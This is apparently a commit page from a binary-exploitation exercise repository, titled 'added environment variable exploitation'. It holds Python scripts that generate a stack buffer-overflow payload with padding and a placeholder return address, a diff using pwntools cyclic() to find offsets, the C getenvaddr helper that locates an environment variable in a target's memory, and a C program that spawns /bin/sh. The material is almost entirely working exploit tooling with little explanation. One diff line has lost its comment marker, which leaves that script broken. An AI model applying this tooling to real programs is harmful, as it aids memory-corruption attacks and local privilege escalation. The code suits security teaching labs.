Commit 2e35144b authored by Ines Kramer's avatar Ines Kramer

added environment variable exploitation

parent da0f4b47
#!/usr/bin/env python
from struct import *
buf = ""
# last version: buf += "A"*400
buf += "A"*104
buf += pack("<Q", 0x424242424242)
buf+="C"*200
f = open("in.txt", "w")
f.write(buf)
#!/usr/bin/env python
from struct import *
buf = ""
# Your code goes here
f = open("in.txt", "w")
f.write(buf)
/*
* I'm not the author of this code, and I'm not sure who is.
* There are several variants floating around on the Internet,
* but this is the one I use.
*/
#include <stdio.h>
#include <stdlib.h>
#include <string.h>
int main(int argc, char *argv[]) {
char *ptr;
if(argc < 3) {
printf("Usage: %s <environment variable> <target program name>\n", argv[0]);
exit(0);
}
ptr = getenv(argv[1]); /* get env var location */
ptr += (strlen(argv[0]) - strlen(argv[2]))*2; /* adjust for program name */
printf("%s will be at %p\n", argv[1], ptr);
}
\ No newline at end of file
......@@ -4,7 +4,7 @@ from pwn import *
buf = ""
# last version: buf += "A"*400
last version: buf += "A"*400
buf+= cyclic(200)
f = open("in.txt", "w")
......
#include <stdlib.h>
#include <unistd.h>
void main (int argc, char ** argv){
char *name[2];
name[0]="/bin/sh";
name[1]=NULL;
execve(name[0], &name[0], &name[1]);
exit(0);
}
\ No newline at end of file
Markdown is supported
0% or
You are about to add 0 people to the discussion. Proceed with caution.
Finish editing this message first!
Please register or to comment